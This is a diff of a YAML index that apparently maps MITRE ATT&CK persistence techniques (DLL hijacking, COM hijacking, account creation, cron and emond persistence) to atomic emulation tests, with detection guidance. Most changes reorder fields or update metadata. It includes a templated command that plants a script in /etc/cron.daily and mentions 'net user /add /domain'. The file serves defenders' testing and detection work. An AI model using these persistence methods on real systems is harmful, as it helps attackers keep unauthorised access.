+ - File monitoring
+ x_mitre_detection: |-
+ Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
+
+ Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
x_mitre_data_sources:
- Component firmware
- Process monitoring
- Disk forensics
- API monitoring
- x_mitre_detection: |-
- Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
-
- Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host intrusion prevention systems
- - File monitoring
- x_mitre_permissions_required:
- - SYSTEM
- x_mitre_system_requirements:
- - Ability to update component device firmware from the host operating system.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1546.015:
technique:
@@ -9720,18 +9935,12 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-16T14:19:22.457Z'
+ modified: '2020-07-09T13:55:51.172Z'
created: '2020-03-16T14:12:47.923Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - ENDGAME
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
- - DLL monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "There are opportunities to detect COM hijacking by searching
for Registry references that have been replaced and through Registry operations
(ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary
@@ -9747,10 +9956,16 @@ persistence:
if software DLL loads are collected and analyzed, any unusual DLL load that
can be correlated with a COM object Registry modification may indicate COM
hijacking has been performed. "
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
+ - DLL monitoring
+ - Windows Registry
+ x_mitre_contributors:
+ - Elastic
+ x_mitre_platforms:
+ - Windows
identifier: T1546.015
atomic_tests:
- name: COM Hijack Leveraging user scope COR_PROFILER
@@ -9889,22 +10104,22 @@ persistence:
phase_name: persistence
modified: '2020-03-27T14:49:58.249Z'
created: '2020-02-11T18:18:34.279Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_contributors:
+ - CrowdStrike Falcon OverWatch
+ x_mitre_data_sources:
+ - Process monitoring
+ - Binary file metadata
x_mitre_detection: "Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment. Look
for changes to client software that do not correlate with known software or
patch cycles. \n\nConsider monitoring for anomalous behavior from client applications,
such as atypical module loads, file reads/writes, or network connections."
- x_mitre_data_sources:
- - Process monitoring
- - Binary file metadata
- x_mitre_contributors:
- - CrowdStrike Falcon OverWatch
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
atomic_tests: []
T1136:
technique:
@@ -9931,8 +10146,23 @@ persistence:
phase_name: persistence
modified: '2020-03-24T12:44:28.199Z'
created: '2017-12-14T16:46:06.044Z'
- x_mitre_permissions_required:
- - Administrator
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Microsoft Threat Intelligence Center (MSTIC)
+ - Praetorian
+ x_mitre_version: '2.1'
+ x_mitre_data_sources:
+ - Office 365 account logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ - Process monitoring
+ - Process command-line parameters
+ - Authentication logs
+ - Windows event logs
+ x_mitre_detection: |-
+ Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.
+
+ Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.
x_mitre_platforms:
- Linux
- macOS
@@ -9942,45 +10172,20 @@ persistence:
- Azure AD
- Azure
- Office 365
- x_mitre_detection: |-
- Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.
-
- Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.
- x_mitre_data_sources:
- - Office 365 account logs
- - Azure activity logs
- - AWS CloudTrail logs
- - Process monitoring
- - Process command-line parameters
- - Authentication logs
- - Windows event logs
- x_mitre_version: '2.1'
- x_mitre_contributors:
- - Microsoft Threat Intelligence Center (MSTIC)
- - Praetorian
- x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - Administrator
atomic_tests: []
T1543:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1543
- url: https://attack.mitre.org/techniques/T1543
- - url: https://technet.microsoft.com/en-us/library/cc772408.aspx
- description: Microsoft. (n.d.). Services. Retrieved June 7, 2016.
- source_name: TechNet Services
- - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
- description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved
- July 10, 2017.
- source_name: AppleDocs Launch Agent Daemons
- - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf
- description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical
- OS X Malware Detection & Analysis. Retrieved July 10, 2017.'
- source_name: OSX Malware Detection
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Create or Modify System Process
+ created: '2020-01-10T16:03:18.865Z'
+ modified: '2020-03-25T22:32:16.537Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
description: "Adversaries may create or modify system-level processes to repeatedly
execute malicious payloads as part of persistence. When operating systems
boot up, they can start processes that perform background system functions.
@@ -9996,15 +10201,25 @@ persistence:
under root/SYSTEM privileges. Adversaries may leverage this functionality
to create or modify system processes in order to escalate privileges. (Citation:
OSX Malware Detection). "
- id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-25T22:32:16.537Z'
- created: '2020-01-10T16:03:18.865Z'
+ name: Create or Modify System Process
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1543
+ url: https://attack.mitre.org/techniques/T1543
+ - url: https://technet.microsoft.com/en-us/library/cc772408.aspx
+ description: Microsoft. (n.d.). Services. Retrieved June 7, 2016.
+ source_name: TechNet Services
+ - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
+ description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved
+ July 10, 2017.
+ source_name: AppleDocs Launch Agent Daemons
+ - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf
+ description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical
+ OS X Malware Detection & Analysis. Retrieved July 10, 2017.'
+ source_name: OSX Malware Detection
x_mitre_platforms:
- Windows
- macOS
@@ -10055,12 +10270,11 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-23T23:30:46.546Z'
created: '2019-12-03T14:25:00.538Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -10071,11 +10285,12 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
- x_mitre_permissions_required:
- - User
- x_mitre_remote_support: false
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
@@ -10127,6 +10342,30 @@ persistence:
command: echo "#{command}" > /etc/cron.daily/#{cron_script_name}
T1574.001:
technique:
+ created: '2020-03-13T18:11:08.357Z'
+ modified: '2020-03-26T16:13:58.862Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
+
+ There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
+
+ Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)
+
+ If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
+ Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
+ name: DLL Search Order Hijacking
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.001
@@ -10157,30 +10396,6 @@ persistence:
url: https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html
description: Nick Harbour. (2010, September 1). DLL Search Order Hijacking
Revisited. Retrieved March 13, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: DLL Search Order Hijacking
- description: |-
- Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
-
- There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
-
- Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)
-
- If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
- Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
- id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T16:13:58.862Z'
- created: '2020-03-13T18:11:08.357Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -10257,23 +10472,23 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T16:23:21.010Z'
+ modified: '2020-06-20T22:05:42.513Z'
created: '2020-03-13T19:41:37.908Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Loaded DLLs
- - Process monitoring
- - Process use of network
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Monitor processes for unusual activity (e.g., a process that
does not use the network begins to do so). Track DLL metadata, such as a hash,
and compare DLLs that are loaded at process execution time against previous
executions to detect differences that do not correlate with patching or updates.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - Loaded DLLs
+ - Process monitoring
+ - Process use of network
+ x_mitre_platforms:
+ - Windows
identifier: T1574.002
atomic_tests:
- name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -10340,6 +10555,20 @@ persistence:
phase_name: initial-access
modified: '2020-03-23T21:37:34.567Z'
created: '2020-03-13T20:15:31.974Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_detection: Monitor whether default accounts have been activated or logged
+ into. These audits should also include checks on any appliances and applications
+ for default credentials or SSH keys, and if any are discovered, they should
+ be updated immediately.
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
x_mitre_platforms:
- Linux
- macOS
@@ -10350,23 +10579,24 @@ persistence:
- Office 365
- Azure AD
- SaaS
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_detection: Monitor whether default accounts have been activated or logged
- into. These audits should also include checks on any appliances and applications
- for default credentials or SSH keys, and if any are discovered, they should
- be updated immediately.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1136.002:
technique:
+ created: '2020-01-28T14:05:17.825Z'
+ modified: '2020-03-23T18:12:36.696Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ type: attack-pattern
+ id: attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177
+ description: |-
+ Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.
+
+ Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
+ name: Domain Account
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1136.002
@@ -10375,21 +10605,6 @@ persistence:
description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account
was created. Retrieved June 30, 2017.'
url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Domain Account
- description: |-
- Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.
-
- Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
- id: attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- modified: '2020-03-23T18:12:36.696Z'
- created: '2020-01-28T14:05:17.825Z'
x_mitre_platforms:
- Windows
- macOS
@@ -10412,6 +10627,27 @@ persistence:
atomic_tests: []
T1078.002:
technique:
+ created: '2020-03-13T20:21:54.758Z'
+ modified: '2020-03-23T21:08:40.063Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ type: attack-pattern
+ id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
+ description: |-
+ Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
+
+ Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
+ name: Domain Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.002
@@ -10428,27 +10664,6 @@ persistence:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Domain Accounts
- description: |-
- Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
-
- Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
- id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- modified: '2020-03-23T21:08:40.063Z'
- created: '2020-03-13T20:21:54.758Z'
x_mitre_platforms:
- Linux
- macOS
@@ -10502,12 +10717,13 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T15:32:06.115Z'
+ modified: '2020-06-20T22:06:47.115Z'
created: '2020-03-16T15:23:30.896Z'
- x_mitre_defense_bypassed:
- - Process whitelisting
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
x_mitre_detection: 'Objective-See''s Dylib Hijacking Scanner can be used to
detect potential cases of dylib hijacking. Monitor file systems for moving,
renaming, replacing, or modifying dylibs. Changes in the set of dylibs that
@@ -10515,11 +10731,10 @@ persistence:
with known software, patches, etc., are suspicious. Check the system for multiple
dylibs with the same name and monitor which versions have historically been
loaded into a process. '
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
- x_mitre_platforms:
- - macOS
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
atomic_tests: []
T1546.014:
technique:
@@ -10558,18 +10773,18 @@ persistence:
phase_name: persistence
modified: '2020-03-24T21:37:25.307Z'
created: '2020-01-24T15:15:13.426Z'
- x_mitre_platforms:
- - macOS
- x_mitre_contributors:
- - Ivan Sinyakov
- x_mitre_data_sources:
- - File monitoring
- x_mitre_detection: Monitor emond rules creation by checking for files created
- or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_detection: Monitor emond rules creation by checking for files created
+ or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_contributors:
+ - Ivan Sinyakov
+ x_mitre_platforms:
+ - macOS
identifier: T1546.014
atomic_tests:
- name: Persistance with Event Monitor - emond
@@ -10622,25 +10837,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T21:37:25.477Z'
+ modified: '2020-07-09T13:55:51.501Z'
created: '2020-01-22T21:04:23.285Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - API monitoring
- - Windows event logs
- - System calls
- - Binary file metadata
- - Process use of network
- - WMI Objects
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
- - DLL monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_detection: "Monitoring for additions or modifications of mechanisms
that could be used to trigger event-based execution, especially the addition
of abnormal commands such as execution of unknown programs, opening network
@@ -10661,8 +10861,23 @@ persistence:
of behavior that could lead to other activities, such as making network connections
for Command and Control, learning details about the environment through Discovery,
and conducting Lateral Movement. "
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - API monitoring
+ - Windows event logs
+ - System calls
+ - Binary file metadata
+ - Process use of network
+ - WMI Objects
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
+ - DLL monitoring
+ - Windows Registry
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1098.002:
technique:
@@ -10699,23 +10914,23 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-23T19:49:17.544Z'
+ modified: '2020-05-04T19:18:36.254Z'
created: '2020-01-19T16:54:28.516Z'
- x_mitre_platforms:
- - Windows
- - Office 365
x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- x_mitre_data_sources:
- - Office 365 audit logs
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.
A larger than normal volume of emails sent from an account and similar phishing emails sent from real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1574.005:
technique:
@@ -10753,27 +10968,27 @@ persistence:
phase_name: defense-evasion
modified: '2020-03-26T19:20:23.030Z'
created: '2020-03-13T11:12:18.558Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Stefan Kanthak
- x_mitre_data_sources:
- - Process command-line parameters
- - File monitoring
- x_mitre_detection: |-
- Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
-
- Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_effective_permissions:
- Administrator
- User
- SYSTEM
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
+
+ Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - File monitoring
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1133:
technique:
@@ -10803,23 +11018,24 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T19:37:54.071Z'
+ modified: '2020-06-19T20:07:09.600Z'
created: '2017-05-31T21:31:44.421Z'
- x_mitre_version: '2.1'
- x_mitre_contributors:
- - Daniel Oakley
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Follow best practices for detecting adversary use of [Valid
Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to
remote services. Collect authentication logs and analyze for unusual access
patterns, windows of activity, and access outside of normal business hours.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_contributors:
+ - Daniel Oakley
+ - Travis Smith, Tripwire
+ x_mitre_version: '2.1'
atomic_tests: []
T1574:
technique:
@@ -10836,7 +11052,7 @@ persistence:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Hijack Execution Flow
description: |-
- Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as whitelisting or other restrictions on execution.
+ Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.
There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.
id: attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6
@@ -10848,17 +11064,15 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T17:33:44.855Z'
+ modified: '2020-06-26T16:09:59.324Z'
created: '2020-03-12T20:38:12.465Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - Environment variable
+ - Loaded DLLs
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ - DLL monitoring
x_mitre_detection: |-
Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.
@@ -10871,13 +11085,15 @@ persistence:
